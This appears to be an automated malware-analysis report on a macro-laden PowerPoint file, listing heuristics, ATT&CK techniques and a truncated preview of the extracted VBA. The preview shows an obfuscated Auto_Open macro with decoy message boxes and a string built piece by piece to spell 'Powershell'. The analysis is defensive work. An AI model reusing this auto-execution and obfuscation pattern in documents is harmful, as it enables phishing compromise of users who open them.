MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The OOXML file contains a VBA project with an Auto_Open macro, indicating it's designed to execute code upon opening. The macro primarily consists of multiple MsgBox calls, which are likely intended to obfuscate the true malicious intent or to hinder automated analysis. While no direct payload execution or network communication is evident from the provided script excerpt, the presence of obfuscated VBA and the Auto_Open execution trigger strongly suggest a malicious document designed for initial compromise.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9711 bytes |
SHA-256: 53c15a7e5aa3637b26e3372c71ed44133cfcbbe11e34fd4097140c0b7eab062e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"
Public Sub Auto_Open()
'ZfLOxUACZiUyvfGGCfihLhrhwwnJppMiLMiQEEnZZLnnJEZkJOLkrCirpEiLixDAOMfBUGDZhfvMkTMniiQQkirvkrJMxysMUGJk
'ZfLOgvfxUACZiUyvfGGCfihLhrhwwnJppMiLMiQEEnZZLnnJEZkJOLkrCirpEiLixDAOMfBUGDZhfvMkTMniiQQkirvkrJMxysMUGJk
'GOssUAsGxypBpvvkhDZLBBCCyiCywGCEfOwAfkCxMrMkTJvnEyGJQAJkfhyMGyfypUAwxDTnJnLxBrkGABrCQTErkAvBsCUxJZOnUCThQJQwkvZpnJGkEkyTrUpphUfxLnTTCLOhZfCATwDxkfnxiGknGrxMsxQZEyOLLhfUOMBGvCMExGLwOLfTUUhknprnDwiMZZEEMLDiJEwZTLTvEMsAkTsDMvinvMECGQpwDJEJUUfTTvfyTUCfhvOGOhErAfskQyTrpEADBCTAkiiEpwZJrGykLxZBfnyLCCrnkpvwvpJxLBBQiMxOZCGDQfsGpDMnhshCTOAMyLZxBAnxvLhfTvnQiknTBOLpALTUOwvnhxrwwxGhhkkJBsZLfGGfAUEvMApyUkDxvJnAZBMfEpGUJwsnMsZZfpGOLUEJAOpBTvxUfOMhhwAQkCUBnsUxnLifEhLDCOExQkwZiysJDrTsnfJvQTkMEGMshUTBJfxUnJQQZDJZ
t = Timer
MsgBox "ECTOwpGMfxyBUCyByBsZwJsBfrfGOrMZUvssZBGErhQDsyhQrUyUUMTsAixnvQJpxDkpAxrOOphDJnsiffAEBZDULMwDEhUEnkkM " & Format(Timer - t, "0.0 86754633586748656347675958")
MsgBox "DwpQhspOyrJZJrOMvyiwEsrMLTQfiLMsnCfpCGChpnZrsZwnLswTyZJwBpOssvQDTyCxJnrOpLLrkQfnEwxCJxyTysssypTfBUMU", vbCritical
MsgBox "ECTOwpGMfxyBUCyByBsZwJsBfrfGOrMZUvssZBGErhQDsyhQrUyUUMTsAixnvQJpxDkpAxrOOphDJnsiffAEBZDULMwDEhUEnkkM " & Format(Timer - t, "0.0 86754633586748656347675958")
MsgBox "ECTOwpGMfxyBUCyByBsZwJsBfrfGOrMZUvssZBGErhQDsyhQrUyUUMTsAixnvQJpxDkpAxrOOphDJnsiffAEBZDULMwDEhUEnkkM " & Format(Timer - t, "0.0 86754633586748656347675958")
MsgBox "ECTOwpGMfxyBUCyByBsZwJsBfrfGOrMZUvssZBGErhQDsyhQrUyUUMTsAixnvQJpxDkpAxrOOphDJnsiffAEBZDULMwDEhUEnkkM " & Format(Timer - t, "0.0 86754633586748656347675958")
MsgBox "DwpQhspOyrJZJrOMvyiwEsrMLTQfiLMsnCfpCGChpnZrsZwnLswTyZJwBpOssvQDTyCxJnrOpLLrkQfnEwxCJxyTysssypTfBUMU", vbCritical
MsgBox "DwpQhspOyrJZJrOMvyiwEsrMLTQfiLMsnCfpCGChpnZrsZwnLswTyZJwBpOssvQDTyCxJnrOpLLrkQfnEwxCJxyTysssypTfBUMU", vbCritical
MsgBox "DwpQhspOyrJZJrOMvyiwEsrMLTQfiLMsnCfpCGChpnZrsZwnLswTyZJwBpOssvQDTyCxJnrOpLLrkQfnEwxCJxyTysssypTfBUMU", vbCritical
'Save the Workbook before changing cells
'Copy the data
'Define the target Range. 'Save the Workbook before changing cells
'Copy the data
'Selection.FormatConditions(1).StopIfTrue = False
'Define the target Range.
On Error Resume Next
vcQLGtSNcNRHDbBBrskJeaOWJNucGaWvWNJeYvCiYYJcLQVfFJoA.Tables(1).Delete
vcQLGtSNcNRHDbBBrskJeaOWJNucGaWvWNJeYvCiYYJcLQVfFJoA.pc
pc.Bookmarks.Add "pc", vcQLGtSNcNRHDbBBrskJeaOWJNucGaWvWNJeYvCiYYJcLQVfFJoA
'pc pc
'MsgBox ("hLMJQPoEHODc HuuKihiXhbUYGVNPJNszpvYCpbhFy")
'cUIAyKVkKVvApYAhuJoFfhpFYWzJZLJPSdieYiwbHPnQnRUAGudRHMUWpcCCvupBubIfRrNfzPCsRySLbD
'yhBKtrWRtIkZOWGRnAAvyaFaeNKBWdPTYOTXscCAYiKR
Dim DetIofVLJrF, TQYVZUGYRWrP
'AdhaQfweuSpvLLNwapoeQcrDiTC
'zSAfQhZXeDrsWescZH
'JAZyrwQykhZrhiypyfQQfDxDJfZJCZLBrUswpvnCQCUfkhLsZiEDwynrJiGhOpABvCQpCrQpGTQkUUxwCiBfJUvBiisEiOfJsOkChOJhiZBvyiBpDfxQDviJMEwfLBwykpUBhMDDkiyvpMLQAwJxGDTGQwvDiEBALkTCQMxDQipyJAUMAwrJUUJyyLBGEMyGpCTkxvQAirxiEMBhxvEUMUrsQMhOEyAwwxCCUhTfQLprDpEUxixyBMhEkLJCikOwZLyOrwpTkGyUBQMkvpfxsTrETLrfnpUpAipZTxrLBhGOxOykZMnBrfhhhErAnCUOOCvhJyfEUCBvJxOvfDxnAOyvkxTwkLxEOyQnDhQfDvkOJZnxxiBswiBMJMBCwsAfQxfAZApBsUDGkvUnCpUACOQQOwiDkyDQsrOCUGwABMMCCpOZZMMkTQLkxDELEBUUZsEfGAkiOvDCOyynZfLLyxvAAJQZDpiMZZwAUxyOiLpifBOhirnG
pCEkMJuuYDfsXQBGGHW = "P": FkfCyyXFhdVWiXrcPT = "o": sWeSaDBTEWNWTvkvkfXurMMbLDuDTHw = "w": skULfCDbBOkWPJHsHbbOD = "e": tKAttBJtrtc = "r": yiZdIAPNwbXWB = "s": zKFOUzUceLSWoWkZaHJ = "h": AieAftayYnN = "e": OdbnQB = "l": CYYS = "l":
'WHRrGwGARwMfwnibKrsiHbAvIodBDDBdHiBEUcpnvcODZyPqZUiPZepUiENSMeXnPec
'vcQLGtSNcNRHDbBBrskJeaOWJNucGaWvWNJeYvCiYYJcLQVfFJoA bvJQRdbptURordynCKZSPNDOWfNHt
'YIQZQstWrPiWuFObNBXFzJUapwrvNzchaWcaiyDJcABuZFMaZskA pc
'SHYRcXBJDYXQfyouLUcINeeKPdNtaPNVWXOZMnrswpiQWdVXUGZdbnfobTcYpekOvHUkJoGsFvyEWoNLkP Zhr
With Selection
.ClearContents
.Borders(xlDiagonalDown).LineStyle = xlNone
.Borders(xlDiagonalUp).LineStyle = xlNone
.Borders(xlEdgeLeft).LineStyle = xlNone
.Borders(xlEdgeTop).LineStyle = xlNone
.Borders(xlEdgeBottom).LineStyle = xlNone
.Borders
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbaProject.bin | 46592 bytes |
SHA-256: b9c7654c020b0aa3d0759d4ee7a133578132e637a4f7d5ff64f37d1a35df0cd5 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 7 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.